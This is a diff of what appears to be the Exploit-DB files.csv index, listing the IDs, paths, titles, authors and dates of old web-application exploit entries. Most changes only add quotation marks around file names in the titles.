-27098,platforms/php/webapps/27098.txt,"RedKernel Referrer Tracker 1.1.0-3 - Rkrt_stats.php Cross-Site Scripting",2006-01-16,Preddy,php,webapps,0 +27097,platforms/php/webapps/27097.txt,"PHPXplorer 0.9.33 - 'Workspaces.php' Directory Traversal",2006-01-16,"Oriol Torrent Santiago",php,webapps,0 +27098,platforms/php/webapps/27098.txt,"RedKernel Referrer Tracker 1.1.0-3 - 'Rkrt_stats.php' Cross-Site Scripting",2006-01-16,Preddy,php,webapps,0 27099,platforms/php/webapps/27099.txt,"BlogPHP 1.0 - 'index.php' SQL Injection",2006-01-16,"Aliaksandr Hartsuyeu",php,webapps,0 27100,platforms/php/webapps/27100.txt,"microBlog 2.0 - 'index.php' Multiple SQL Injections",2006-01-17,"Aliaksandr Hartsuyeu",php,webapps,0 27102,platforms/php/webapps/27102.txt,"PowerPortal 1.1/1.3 - 'index.php' Cross-Site Scripting",2006-01-17,night_warrior771,php,webapps,0 @@ -29563,7 +29564,7 @@ id,file,description,date,author,platform,type,port 27104,platforms/php/webapps/27104.txt,"aoblogger 2.3 - URL BBcode Cross-Site Scripting",2006-01-17,"Aliaksandr Hartsuyeu",php,webapps,0 27105,platforms/php/webapps/27105.txt,"aoblogger 2.3 - 'login.php Username' SQL Injection",2006-01-17,"Aliaksandr Hartsuyeu",php,webapps,0 27106,platforms/php/webapps/27106.txt,"aoblogger 2.3 - create.php Unauthenticated Entry Creation",2006-01-17,"Aliaksandr Hartsuyeu",php,webapps,0 -27107,platforms/php/webapps/27107.txt,"PHPXplorer 0.9.33 - action.php Directory Traversal",2006-01-16,liz0,php,webapps,0 +27107,platforms/php/webapps/27107.txt,"PHPXplorer 0.9.33 - 'action.php' Directory Traversal",2006-01-16,liz0,php,webapps,0 27109,platforms/php/webapps/27109.txt,"Phpclanwebsite 1.23.1 - BBCode IMG Tag Script Injection",2005-12-28,"kurdish hackers team",php,webapps,0 27110,platforms/php/webapps/27110.txt,"EggBlog 2.0 - 'id' SQL Injection",2006-01-18,alex@evuln.com,php,webapps,0 27111,platforms/php/webapps/27111.txt,"EggBlog 2.0 - 'message' Cross-Site Scripting",2006-01-18,alex@evuln.com,php,webapps,0 @@ -29588,16 +29589,16 @@ id,file,description,date,author,platform,type,port 27134,platforms/hardware/webapps/27134.pl,"Broadkam PJ871 - Authentication Bypass",2013-07-27,d3c0der,hardware,webapps,0 27136,platforms/php/webapps/27136.txt,"Symantec Web Gateway 5.1.0.x - Multiple Vulnerabilities",2013-07-27,"SEC Consult",php,webapps,0 27137,platforms/php/webapps/27137.txt,"MyBB 1.0.2 - Multiple Cross-Site Scripting Vulnerabilities",2005-12-26,imei,php,webapps,0 -27138,platforms/php/webapps/27138.txt,"AndoNET Blog 2004.9.2 - Comentarios.php SQL Injection",2006-01-26,"Aliaksandr Hartsuyeu",php,webapps,0 +27138,platforms/php/webapps/27138.txt,"AndoNET Blog 2004.9.2 - 'Comentarios.php' SQL Injection",2006-01-26,"Aliaksandr Hartsuyeu",php,webapps,0 27139,platforms/php/webapps/27139.txt,"My Little Homepage Products - BBCode Link Tag Script Injection",2006-01-26,"Aliaksandr Hartsuyeu",php,webapps,0 27141,platforms/cgi/webapps/27141.txt,"Elido Face Control - Multiple Directory Traversal Vulnerabilities",2006-01-26,"HSC Security Group",cgi,webapps,0 27142,platforms/asp/webapps/27142.txt,"ASPThai Forums 8.0 - 'login.asp' SQL Injection",2006-01-19,code.shell,asp,webapps,0 27143,platforms/asp/webapps/27143.txt,"ZixForum 1.12 - forum.asp Multiple SQL Injections",2005-12-15,"Tran Viet Phuong",asp,webapps,0 -27146,platforms/php/webapps/27146.txt,"sPaiz-Nuke - modules.php Cross-Site Scripting",2006-01-30,night_warrior771,php,webapps,0 +27146,platforms/php/webapps/27146.txt,"sPaiz-Nuke - 'modules.php' Cross-Site Scripting",2006-01-30,night_warrior771,php,webapps,0 27147,platforms/php/webapps/27147.txt,"PmWiki 2.1 - Multiple Input Validation Vulnerabilities",2006-01-30,aScii,php,webapps,0 27149,platforms/php/webapps/27149.txt,"Ashwebstudio Ashnews 0.83 - Cross-Site Scripting",2006-01-30,0o_zeus_o0,php,webapps,0 27151,platforms/asp/webapps/27151.txt,"Daffodil CRM 1.5 - Userlogin.asp SQL Injection",2006-01-30,preben@watchcom.no,asp,webapps,0 -27153,platforms/php/webapps/27153.txt,"Cerberus Helpdesk 2.7 - Clients.php Cross-Site Scripting",2006-01-31,preben@watchcom.no,php,webapps,0 +27153,platforms/php/webapps/27153.txt,"Cerberus Helpdesk 2.7 - 'Clients.php' Cross-Site Scripting",2006-01-31,preben@watchcom.no,php,webapps,0 27154,platforms/php/webapps/27154.txt,"Farsinews 2.1 - 'Loginout.php' Remote File Inclusion",2006-01-31,"Hamid Ebadi",php,webapps,0 27155,platforms/php/webapps/27155.txt,"MyBB 1.0/1.1 - 'index.php' Referrer Cookie SQL Injection",2006-01-31,Devil-00,php,webapps,0 27156,platforms/php/webapps/27156.txt,"SZUserMgnt 1.4 - 'Username' SQL Injection",2006-02-01,"Aliaksandr Hartsuyeu",php,webapps,0 @@ -29610,11 +29611,11 @@ id,file,description,date,author,platform,type,port 27164,platforms/php/webapps/27164.txt,"UBBCentral UBB.Threads 6.3 - 'showflat.php' SQL Injection",2006-01-29,k-otik,php,webapps,0 27165,platforms/php/webapps/27165.txt,"Beehive Forum 0.6.2 - 'index.php' SQL Injection",2005-12-22,trueend5,php,webapps,0 27166,platforms/php/webapps/27166.txt,"EyeOS 0.8.x - Session Remote Command Execution",2006-02-07,"James Bercegay",php,webapps,0 -27167,platforms/php/webapps/27167.txt,"MyBB 1.0.3 - moderation.php SQL Injection",2006-02-07,imei,php,webapps,0 +27167,platforms/php/webapps/27167.txt,"MyBB 1.0.3 - 'moderation.php' SQL Injection",2006-02-07,imei,php,webapps,0 27169,platforms/asp/webapps/27169.txt,"Webeveyn Whomp! Real Estate Manager 2005 - Login SQL Injection",2006-02-08,night_warrior771,asp,webapps,0 27170,platforms/php/webapps/27170.txt,"vwdev - 'index.php' SQL Injection",2006-02-08,"Omid Aghababaei",php,webapps,0 27172,platforms/php/webapps/27172.txt,"SPIP 1.8.2 - Spip_RSS.php Remote Command Execution",2006-02-08,rgod,php,webapps,0 -27173,platforms/php/webapps/27173.txt,"CPAINT 1.3/2.0 - TYPE.php Cross-Site Scripting",2006-02-08,"James Bercegay",php,webapps,0 +27173,platforms/php/webapps/27173.txt,"CPAINT 1.3/2.0 - 'TYPE.php' Cross-Site Scripting",2006-02-08,"James Bercegay",php,webapps,0 27174,platforms/asp/webapps/27174.txt,"GA's Forum Light - 'Archive.asp' SQL Injection",2006-02-07,Dj_Eyes,asp,webapps,0 27175,platforms/php/webapps/27175.php,"PwsPHP 1.2.3 - SQL Injection",2006-02-09,papipsycho,php,webapps,0 27176,platforms/php/webapps/27176.txt,"Papoo 2.1.x - Multiple Cross-Site Scripting Vulnerabilities",2006-02-09,"Dj Eyes",php,webapps,0 @@ -29644,8 +29645,8 @@ id,file,description,date,author,platform,type,port 27207,platforms/php/webapps/27207.txt,"Clever Copy 2.0/3.0 - Multiple HTML Injection Vulnerabilities",2006-02-13,"Aliaksandr Hartsuyeu",php,webapps,0 27208,platforms/php/webapps/27208.txt,"PHP-Nuke 6.x/7.x - 'header.php?Pagetitle' Cross-Site Scripting",2006-02-13,"Janek Vind",php,webapps,0 27209,platforms/php/webapps/27209.txt,"Gastebuch 1.3.2 - Cross-Site Scripting",2006-02-13,"Micha Borrmann",php,webapps,0 -27213,platforms/php/webapps/27213.txt,"QwikiWiki 1.5 - search.php Cross-Site Scripting",2006-02-14,Citynova,php,webapps,0 -27214,platforms/php/webapps/27214.txt,"DELTAScripts PHP Classifieds 6.20 - Member_Login.php SQL Injection",2006-02-14,"Audun Larsen",php,webapps,0 +27213,platforms/php/webapps/27213.txt,"QwikiWiki 1.5 - 'search.php' Cross-Site Scripting",2006-02-14,Citynova,php,webapps,0 +27214,platforms/php/webapps/27214.txt,"DELTAScripts PHP Classifieds 6.20 - 'Member_Login.php' SQL Injection",2006-02-14,"Audun Larsen",php,webapps,0 27215,platforms/php/webapps/27215.txt,"sNews - Comment Body Cross-Site Scripting",2006-02-14,joffer,php,webapps,0 27216,platforms/php/webapps/27216.txt,"sNews - 'index.php' Multiple SQL Injections",2006-02-14,joffer,php,webapps,0 27217,platforms/php/webapps/27217.txt,"dotProject 2.0 - '/modules/projects/gantt.php?dPconfig[root_dir]' Remote File Inclusion",2006-02-14,r.verton,php,webapps,0 @@ -29666,8 +29667,8 @@ id,file,description,date,author,platform,type,port 27237,platforms/php/webapps/27237.txt,"HTML::BBCode 1.03/1.04 - HTML Injection",2006-02-15,"Aliaksandr Hartsuyeu",php,webapps,0 27238,platforms/php/webapps/27238.php,"Dreamcost HostAdmin 3.0 - 'index.php' Remote File Inclusion",2006-02-16,ReZEN,php,webapps,0 27239,platforms/php/webapps/27239.txt,"BirthSys 3.1 - Multiple SQL Injections",2006-02-15,"Aliaksandr Hartsuyeu",php,webapps,0 -27240,platforms/php/webapps/27240.txt,"MyBB 1.0.2/1.0.3 - Managegroup.php SQL Injection",2006-02-16,imei,php,webapps,0 -27242,platforms/php/webapps/27242.txt,"MyBB 1.0.3 - Managegroup.php Cross-Site Scripting",2006-02-16,imei,php,webapps,0 +27240,platforms/php/webapps/27240.txt,"MyBB 1.0.2/1.0.3 - 'Managegroup.php' SQL Injection",2006-02-16,imei,php,webapps,0 +27242,platforms/php/webapps/27242.txt,"MyBB 1.0.3 - 'Managegroup.php' Cross-Site Scripting",2006-02-16,imei,php,webapps,0 27243,platforms/php/webapps/27243.txt,"Siteframe Beaumont 5.0.1/5.0.2 - 'page.php' HTML Injection",2006-02-16,federico.alice@tiscali.it,php,webapps,0 27245,platforms/php/webapps/27245.txt,"V-Webmail 1.6.2 - Multiple Cross-Site Scripting Vulnerabilities",2006-02-17,$um$id,php,webapps,0 27247,platforms/php/webapps/27247.txt,"E107 Website System 0.7.2 Chatbox Plugin - HTML Injection",2006-02-18,"marc & shb",php,webapps,0 @@ -29690,7 +29691,7 @@ id,file,description,date,author,platform,type,port 27267,platforms/php/webapps/27267.txt,"Dragonfly CMS 9.0.6.1 Surveys Module - Multiple Cross-Site Scripting Vulnerabilities",2006-02-22,Lostmon,php,webapps,0 27268,platforms/php/webapps/27268.txt,"Dragonfly CMS 9.0.6.1 Downloads Module - c Parameter Cross-Site Scripting",2006-02-22,Lostmon,php,webapps,0 27269,platforms/php/webapps/27269.txt,"Dragonfly CMS 9.0.6.1 Coppermine Module - album Parameter Cross-Site Scripting",2006-02-22,Lostmon,php,webapps,0 -27494,platforms/php/webapps/27494.txt,"phpMyFamily 1.4.1 - Track.php Cross-Site Scripting",2006-03-28,matrix_killer,php,webapps,0 +27494,platforms/php/webapps/27494.txt,"phpMyFamily 1.4.1 - 'Track.php' Cross-Site Scripting",2006-03-28,matrix_killer,php,webapps,0 27495,platforms/php/webapps/27495.txt,"PHPCOIN 1.2 - 'mod_print.php?fs' Cross-Site Scripting",2006-03-28,r0t,php,webapps,0 27496,platforms/php/webapps/27496.txt,"PHPCOIN 1.2 - 'mod.php?fs' Cross-Site Scripting",2006-03-28,r0t,php,webapps,0 27272,platforms/php/webapps/27272.txt,"SocialEngine Timeline Plugin 4.2.5p9 - Arbitrary File Upload",2013-08-02,spyk2r,php,webapps,0 @@ -29707,7 +29708,7 @@ id,file,description,date,author,platform,type,port 27289,platforms/hardware/webapps/27289.txt,"TP-Link TL-SC3171 IP Cameras - Multiple Vulnerabilities",2013-08-02,"Core Security",hardware,webapps,0 27290,platforms/php/webapps/27290.txt,"WordPress Plugin Better WP Security - Persistent Cross-Site Scripting",2013-08-02,"Richard Warren",php,webapps,0 27291,platforms/windows/webapps/27291.txt,"Oracle Hyperion 11 - Directory Traversal",2013-08-02,"Richard Warren",windows,webapps,19000 -27298,platforms/php/webapps/27298.txt,"Web Calendar Pro - Dropbase.php SQL Injection",2006-02-23,ReZEN,php,webapps,0 +27298,platforms/php/webapps/27298.txt,"Web Calendar Pro - 'Dropbase.php' SQL Injection",2006-02-23,ReZEN,php,webapps,0 27299,platforms/php/webapps/27299.txt,"NOCC 1.0 - 'error.php?html_error_occurred' Cross-Site Scripting",2006-02-23,rgod,php,webapps,0 27300,platforms/php/webapps/27300.txt,"NOCC 1.0 - 'filter_prefs.php?html_filter_select' Cross-Site Scripting",2006-02-23,rgod,php,webapps,0 27301,platforms/php/webapps/27301.txt,"NOCC 1.0 - 'no_mail.php?html_no_mail' Cross-Site Scripting",2006-02-23,rgod,php,webapps,0 @@ -29725,11 +29726,11 @@ id,file,description,date,author,platform,type,port 27313,platforms/php/webapps/27313.txt,"DCI-Taskeen 1.03 - 'basket.php' Multiple SQL Injections",2006-02-25,Linux_Drox,php,webapps,0 27314,platforms/php/webapps/27314.txt,"DCI-Taskeen 1.03 - 'cat.php' Multiple SQL Injections",2006-02-25,Linux_Drox,php,webapps,0 27315,platforms/php/webapps/27315.txt,"RiteCMS 1.0.0 - Multiple Vulnerabilities",2013-08-03,"Yashar shahinzadeh",php,webapps,0 -27318,platforms/php/webapps/27318.txt,"PHP-Nuke 7.8 - Mainfile.php SQL Injection",2006-02-25,waraxe,php,webapps,0 +27318,platforms/php/webapps/27318.txt,"PHP-Nuke 7.8 - 'Mainfile.php' SQL Injection",2006-02-25,waraxe,php,webapps,0 27320,platforms/hardware/webapps/27320.txt,"Thomson SpeedTouch 500 Series - LocalNetwork Page name Parameter Cross-Site Scripting",2006-02-25,"Preben Nylokken",hardware,webapps,0 27321,platforms/php/webapps/27321.txt,"Fantastic News 2.1.1 - SQL Injection",2006-02-27,SAUDI,php,webapps,0 27322,platforms/php/webapps/27322.txt,"Woltlab Burning Board 1.1.1/2.x - 'galerie_index.php?Username' Cross-Site Scripting",2006-02-27,botan,php,webapps,0 -27323,platforms/php/webapps/27323.txt,"Woltlab Burning Board 1.1.1/2.x - galerie_onfly.php Cross-Site Scripting",2006-02-27,botan,php,webapps,0 +27323,platforms/php/webapps/27323.txt,"Woltlab Burning Board 1.1.1/2.x - 'galerie_onfly.php' Cross-Site Scripting",2006-02-27,botan,php,webapps,0 27324,platforms/php/webapps/27324.txt,"Archangel Weblog 0.90.2 - Authentication Bypass",2006-02-27,KingOfSka,php,webapps,0 27327,platforms/php/webapps/27327.txt,"D3Jeeb Pro 3 - 'fastlinks.php?catid' SQL Injection",2006-02-25,SAUDI,php,webapps,0 27328,platforms/php/webapps/27328.txt,"D3Jeeb Pro 3 - 'catogary.php?catid' SQL Injection",2006-02-25,SAUDI,php,webapps,0 @@ -29737,13 +29738,13 @@ id,file,description,date,author,platform,type,port 27331,platforms/php/webapps/27331.txt,"n8cms 1.1/1.2 - 'index.php' Multiple Cross-Site Scripting Vulnerabilities",2006-02-27,Liz0ziM,php,webapps,0 27332,platforms/php/webapps/27332.txt,"n8cms 1.1/1.2 - 'mailto.php?userid' Cross-Site Scripting",2006-02-27,Liz0ziM,php,webapps,0 27333,platforms/php/webapps/27333.txt,"QwikiWiki 1.4 - 'index.php' Cross-Site Scripting",2006-02-28,Dr^Death,php,webapps,0 -27336,platforms/php/webapps/27336.txt,"EJ3 TOPo 2.2.178 - Inc_header.php Cross-Site Scripting",2006-02-28,"Yunus Emre Yilmaz",php,webapps,0 +27336,platforms/php/webapps/27336.txt,"EJ3 TOPo 2.2.178 - 'Inc_header.php' Cross-Site Scripting",2006-02-28,"Yunus Emre Yilmaz",php,webapps,0 27337,platforms/php/webapps/27337.txt,"Mozilla Thunderbird 1.5 - Multiple Remote Information Disclosure Vulnerabilities",2006-02-28,Crashfr,php,webapps,0 -27338,platforms/php/webapps/27338.txt,"PEHEPE Membership Management System 3.0 - Sol_menu.php Cross-Site Scripting",2006-02-26,"Yunus Emre Yilmaz",php,webapps,0 +27338,platforms/php/webapps/27338.txt,"PEHEPE Membership Management System 3.0 - 'Sol_menu.php' Cross-Site Scripting",2006-02-26,"Yunus Emre Yilmaz",php,webapps,0 27339,platforms/php/webapps/27339.txt,"PEHEPE Membership Management System 3.0 - Remote PHP Script Code Injection",2006-02-28,"Yunus Emre Yilmaz",php,webapps,0 27340,platforms/php/webapps/27340.txt,"SMBlog 1.2 - Arbitrary PHP Command Execution",2006-03-01,botan,php,webapps,0 -27341,platforms/php/webapps/27341.txt,"DCI-Designs Dawaween 1.03 - Poems.php SQL Injection",2006-03-02,sherba,php,webapps,0 -27342,platforms/php/webapps/27342.txt,"PluggedOut Nexus 0.1 - forgotten_password.php SQL Injection",2006-03-02,"Hamid Ebadi",php,webapps,0 +27341,platforms/php/webapps/27341.txt,"DCI-Designs Dawaween 1.03 - 'Poems.php' SQL Injection",2006-03-02,sherba,php,webapps,0 +27342,platforms/php/webapps/27342.txt,"PluggedOut Nexus 0.1 - 'forgotten_password.php' SQL Injection",2006-03-02,"Hamid Ebadi",php,webapps,0 27343,platforms/php/webapps/27343.txt,"vBulletin 3.0/3.5 - 'profile.php Email' HTML Injection",2006-03-02,imei,php,webapps,0 27344,platforms/php/webapps/27344.txt,"NZ eCommerce System - 'index.php' Multiple SQL Injections",2006-03-02,r0t,php,webapps,0 27345,platforms/php/webapps/27345.txt,"LogIT 1.3/1.4 - Remote File Inclusion",2006-03-02,botan,php,webapps,0 @@ -29751,12 +29752,12 @@ id,file,description,date,author,platform,type,port 27347,platforms/php/webapps/27347.txt,"VBZooM Forum 1.11 - 'comment.php?UserID' Cross-Site Scripting",2006-03-04,Mr.SNAKE,php,webapps,0 27348,platforms/php/webapps/27348.txt,"VBZooM Forum 1.11 - 'contact.php?UserID' Cross-Site Scripting",2006-03-04,Mr.SNAKE,php,webapps,0 27354,platforms/php/webapps/27354.txt,"Easy Forum 2.5 - New User Image File HTML Injection",2006-03-04,"Aliaksandr Hartsuyeu",php,webapps,0 -27355,platforms/php/webapps/27355.txt,"Woltlab Burning Board 2.3.4 - misc.php Cross-Site Scripting",2006-03-04,r57shell,php,webapps,0 +27355,platforms/php/webapps/27355.txt,"Woltlab Burning Board 2.3.4 - 'misc.php' Cross-Site Scripting",2006-03-04,r57shell,php,webapps,0 27362,platforms/php/webapps/27362.txt,"Bitweaver 1.1/1.2 - 'Title' HTML Injection",2006-03-06,Kiki,php,webapps,0 27363,platforms/php/webapps/27363.txt,"PHORUM 3.x/5.x - 'Common.php' Remote File Inclusion",2006-03-06,ERNE,php,webapps,0 27364,platforms/php/webapps/27364.txt,"Game-Panel 2.6 - 'login.php' Cross-Site Scripting",2006-03-06,Retard,php,webapps,0 27557,platforms/php/webapps/27557.pl,"PHPSelect Submit-A-Link - HTML Injection",2006-04-01,s3rv3r_hack3r,php,webapps,0 -27367,platforms/php/webapps/27367.txt,"Link Bank - Iframe.php Cross-Site Scripting",2006-03-07,Retard,php,webapps,0 +27367,platforms/php/webapps/27367.txt,"Link Bank - 'Iframe.php' Cross-Site Scripting",2006-03-07,Retard,php,webapps,0 27368,platforms/php/webapps/27368.txt,"LoudBlog 0.41 - 'podcast.php' SQL Injection",2006-03-07,tzitaroth,php,webapps,0 27369,platforms/php/webapps/27369.txt,"LoudBlog 0.41 - 'index.php' template Parameter Traversal Arbitrary File Access",2006-03-07,tzitaroth,php,webapps,0 27370,platforms/php/webapps/27370.txt,"LoudBlog 0.41 - 'backend_settings.php' Traversal Arbitrary File Access",2006-03-07,tzitaroth,php,webapps,0 @@ -29800,17 +29801,17 @@ id,file,description,date,author,platform,type,port 27415,platforms/php/webapps/27415.txt,"WMNews - 'wmview.php?ArtCat' Cross-Site Scripting",2006-03-10,R00T3RR0R,php,webapps,0 27416,platforms/php/webapps/27416.txt,"WMNews - 'footer.php?ctrrowcol' Cross-Site Scripting",2006-03-10,R00T3RR0R,php,webapps,0 27417,platforms/php/webapps/27417.txt,"WMNews - 'wmcomments.php?ArtID' Cross-Site Scripting",2006-03-10,R00T3RR0R,php,webapps,0 -27419,platforms/php/webapps/27419.txt,"Vegas Forum 1.0 - Forumlib.php SQL Injection",2006-03-13,"Aliaksandr Hartsuyeu",php,webapps,0 -27422,platforms/php/webapps/27422.txt,"CyBoards PHP Lite 1.21/1.25 - post.php SQL Injection",2006-03-14,"Aliaksandr Hartsuyeu",php,webapps,0 +27419,platforms/php/webapps/27419.txt,"Vegas Forum 1.0 - 'Forumlib.php' SQL Injection",2006-03-13,"Aliaksandr Hartsuyeu",php,webapps,0 +27422,platforms/php/webapps/27422.txt,"CyBoards PHP Lite 1.21/1.25 - 'post.php' SQL Injection",2006-03-14,"Aliaksandr Hartsuyeu",php,webapps,0 27423,platforms/php/webapps/27423.txt,"DSCounter 1.2 - 'index.php' SQL Injection",2006-03-14,"Aliaksandr Hartsuyeu",php,webapps,0 27424,platforms/php/webapps/27424.txt,"DSDownload 1.0 - Multiple SQL Injections",2006-03-15,"Aliaksandr Hartsuyeu",php,webapps,0 27427,platforms/php/webapps/27427.txt,"Contrexx CMS 1.0.x - 'index.php' Cross-Site Scripting",2006-03-16,Soot,php,webapps,0 27430,platforms/php/webapps/27430.txt,"PHPFox 3.6.0 (build3) - Multiple SQL Injections",2013-08-08,"Matias Fontanini",php,webapps,0 27431,platforms/php/webapps/27431.txt,"BigTree CMS 4.0 RC2 - Multiple Vulnerabilities",2013-08-08,"High-Tech Bridge SA",php,webapps,0 27991,platforms/php/webapps/27991.txt,"PostNuke 0.76 RC2 - Multiple Input Validation Vulnerabilities",2006-06-07,SpC-x,php,webapps,0 -27990,platforms/php/webapps/27990.txt,"Calendar Express 2.2 - month.php SQL Injection",2006-06-07,"CrAzY CrAcKeR",php,webapps,0 +27990,platforms/php/webapps/27990.txt,"Calendar Express 2.2 - 'month.php' SQL Injection",2006-06-07,"CrAzY CrAcKeR",php,webapps,0 27443,platforms/php/webapps/27443.txt,"Extcalendar 1.0 - Cross-Site Scripting",2006-03-18,Soothackers,php,webapps,0 -27444,platforms/php/webapps/27444.txt,"Woltlab Burning Board 2.3.4 - Class_DB_MySQL.php Cross-Site Scripting",2006-03-18,r57shell,php,webapps,0 +27444,platforms/php/webapps/27444.txt,"Woltlab Burning Board 2.3.4 - 'Class_DB_MySQL.php' Cross-Site Scripting",2006-03-18,r57shell,php,webapps,0 27445,platforms/php/webapps/27445.txt,"MusicBox 2.3 - 'index.php' SQL Injection",2006-03-18,Linux_Drox,php,webapps,0 27446,platforms/php/webapps/27446.txt,"MusicBox 2.3 - 'index.php' Cross-Site Scripting",2006-03-18,Linux_Drox,php,webapps,0 27447,platforms/php/webapps/27447.txt,"MusicBox 2.3 - 'cart.php' Cross-Site Scripting",2006-03-18,Linux_Drox,php,webapps,0 @@ -29822,9 +29823,9 @@ id,file,description,date,author,platform,type,port 27455,platforms/cfm/webapps/27455.txt,"1WebCalendar 4.0 - viewEvent.cfm EventID Parameter SQL Injection",2006-03-22,r0t3d3Vil,cfm,webapps,0 27456,platforms/cfm/webapps/27456.txt,"1WebCalendar 4.0 - '/news/newsView.cfm?NewsID' SQL Injection",2006-03-22,r0t3d3Vil,cfm,webapps,0 27457,platforms/cfm/webapps/27457.txt,"1WebCalendar 4.0 - mainCal.cfm SQL Injection",2006-03-22,r0t3d3Vil,cfm,webapps,0 -27458,platforms/php/webapps/27458.txt,"EasyMoblog 0.5 - Img.php Cross-Site Scripting",2006-03-23,FarhadKey,php,webapps,0 -27459,platforms/php/webapps/27459.txt,"CoMoblog 1.0 - Img.php Cross-Site Scripting",2006-03-23,FarhadKey,php,webapps,0 -27462,platforms/php/webapps/27462.txt,"AdMan 1.0.20051221 - ViewStatement.php SQL Injection",2003-03-23,r0t,php,webapps,0 +27458,platforms/php/webapps/27458.txt,"EasyMoblog 0.5 - 'Img.php' Cross-Site Scripting",2006-03-23,FarhadKey,php,webapps,0 +27459,platforms/php/webapps/27459.txt,"CoMoblog 1.0 - 'Img.php' Cross-Site Scripting",2006-03-23,FarhadKey,php,webapps,0 +27462,platforms/php/webapps/27462.txt,"AdMan 1.0.20051221 - 'ViewStatement.php' SQL Injection",2003-03-23,r0t,php,webapps,0 27463,platforms/jsp/webapps/27463.txt,"IBM Tivoli Business Systems Manager 3.1 - APWC_Win_Main.jsp Cross-Site Scripting",2006-03-23,anonymous,jsp,webapps,0 27464,platforms/cgi/webapps/27464.txt,"Cholod MySQL Based Message Board - Mb.cgi SQL Injection",2006-03-24,kspecial,cgi,webapps,0 27465,platforms/php/webapps/27465.txt,"VihorDesign - 'index.php' Cross-Site Scripting",2006-03-24,botan,php,webapps,0 @@ -29836,14 +29837,14 @@ id,file,description,date,author,platform,type,port 27471,platforms/asp/webapps/27471.txt,"EZHomePagePro 1.5 - 'users_calendar.asp?page' Cross-Site Scripting",2006-03-27,r0t,asp,webapps,0 27472,platforms/asp/webapps/27472.txt,"EZHomePagePro 1.5 - 'users_profiles.asp' Multiple Cross-Site Scripting Vulnerabilities",2006-03-27,r0t,asp,webapps,0 27473,platforms/asp/webapps/27473.txt,"EZHomePagePro 1.5 - 'users_mgallery.asp?usid' Cross-Site Scripting",2006-03-27,r0t,asp,webapps,0 -27475,platforms/php/webapps/27475.txt,"SaPHPLesson 2.0 - print.php SQL Injection",2006-03-27,Linux_Drox,php,webapps,0 +27475,platforms/php/webapps/27475.txt,"SaPHPLesson 2.0 - 'print.php' SQL Injection",2006-03-27,Linux_Drox,php,webapps,0 27477,platforms/php/webapps/27477.txt,"Maian Weblog 2.0 - 'print.php' SQL Injection",2006-03-27,"Aliaksandr Hartsuyeu",php,webapps,0 27478,platforms/php/webapps/27478.txt,"Maian Weblog 2.0 - 'mail.php' SQL Injection",2006-03-27,"Aliaksandr Hartsuyeu",php,webapps,0 27479,platforms/asp/webapps/27479.txt,"Toast Forums 1.6 - Toast.asp Multiple Cross-Site Scripting Vulnerabilities",2006-03-27,r0t,asp,webapps,0 27480,platforms/asp/webapps/27480.txt,"Online Quiz System - 'prequiz.asp?exam' Cross-Site Scripting",2006-03-27,r0t,asp,webapps,0 27481,platforms/asp/webapps/27481.txt,"Online Quiz System - 'student.asp?msg' Cross-Site Scripting",2006-03-27,r0t,asp,webapps,0 27482,platforms/asp/webapps/27482.txt,"Caloris Planitia Technologies School Management System 1.0 - Cross-Site Scripting",2006-03-27,r0t,asp,webapps,0 -27483,platforms/php/webapps/27483.txt,"Pixel Motion - 'admin/index.php' Multiple SQL Injections",2006-03-27,DaBDouB-MoSiKaR,php,webapps,0 +27483,platforms/php/webapps/27483.txt,"Pixel Motion - '/admin/index.php' Multiple SQL Injections",2006-03-27,DaBDouB-MoSiKaR,php,webapps,0 27484,platforms/php/webapps/27484.txt,"Pixel Motion - 'index.php' date Parameter SQL Injection",2006-03-27,DaBDouB-MoSiKaR,php,webapps,0 27485,platforms/php/webapps/27485.txt,"DSLogin 1.0 - 'index.php' Multiple SQL Injections",2006-03-27,"Aliaksandr Hartsuyeu",php,webapps,0 27486,platforms/asp/webapps/27486.txt,"Web Host Automation Ltd. Helm 3.2.10 Beta - 'domains.asp?txtDomainName' Cross-Site Scripting",2006-03-27,r0t,asp,webapps,0 @@ -29893,7 +29894,7 @@ id,file,description,date,author,platform,type,port 27545,platforms/php/webapps/27545.txt,"SoftBiz Image Gallery - 'insert_rating.php?img_id' SQL Injection",2006-03-31,Linux_Drox,php,webapps,0 27546,platforms/php/webapps/27546.txt,"SoftBiz Image Gallery - 'images.php?cid' SQL Injection",2006-03-31,Linux_Drox,php,webapps,0 27548,platforms/php/webapps/27548.txt,"Claroline 1.x - rqmkhtml.php Information Disclosure",2006-03-31,rgod,php,webapps,0 -27549,platforms/php/webapps/27549.txt,"Claroline 1.x - rqmkhtml.php Cross-Site Scripting",2006-03-31,rgod,php,webapps,0 +27549,platforms/php/webapps/27549.txt,"Claroline 1.x - 'rqmkhtml.php' Cross-Site Scripting",2006-03-31,rgod,php,webapps,0 27550,platforms/php/webapps/27550.txt,"Blank'N'Berg 0.2 - Directory Traversal",2006-03-31,"Amine ABOUD",php,webapps,0 27551,platforms/php/webapps/27551.txt,"Blank'N'Berg 0.2 - Cross-Site Scripting",2006-03-31,"Amine ABOUD",php,webapps,0 27552,platforms/asp/webapps/27552.txt,"ISP Site Man - admin_login.asp SQL Injection",2006-04-01,s3rv3r_hack3r,asp,webapps,0 @@ -29909,11 +29910,11 @@ id,file,description,date,author,platform,type,port 27572,platforms/php/webapps/27572.txt,"SKForum 1.x - planning.View.action time Parameter Cross-Site Scripting",2006-04-06,r0t,php,webapps,0 27573,platforms/php/webapps/27573.txt,"SKForum 1.x - user.View.action userID Parameter Cross-Site Scripting",2006-04-06,r0t,php,webapps,0 27574,platforms/php/webapps/27574.txt,"Basic Analysis and Security Engine (BASE) 1.2.4 - PrintFreshPage Cross-Site Scripting",2003-04-06,"Adam Ely",php,webapps,0 -27575,platforms/php/webapps/27575.txt,"MD News 1 - admin.php SQL Injection",2006-04-06,"Aliaksandr Hartsuyeu",php,webapps,0 -27576,platforms/php/webapps/27576.txt,"MAXDEV CMS 1.0.72/1.0.73 - PNuserapi.php SQL Injection",2006-04-06,king_purba,php,webapps,0 +27575,platforms/php/webapps/27575.txt,"MD News 1 - 'admin.php' SQL Injection",2006-04-06,"Aliaksandr Hartsuyeu",php,webapps,0 +27576,platforms/php/webapps/27576.txt,"MAXDEV CMS 1.0.72/1.0.73 - 'PNuserapi.php' SQL Injection",2006-04-06,king_purba,php,webapps,0 27578,platforms/php/webapps/27578.txt,"Jupiter CMS 1.1.5 - 'index.php' Cross-Site Scripting",2006-04-07,KaDaL-X,php,webapps,0 27579,platforms/php/webapps/27579.txt,"Bitweaver CMS 1.3 - Multiple Cross-Site Scripting Vulnerabilities",2006-04-07,KaDaL-X,php,webapps,0 -27580,platforms/php/webapps/27580.txt,"vBulletin 3.5.1 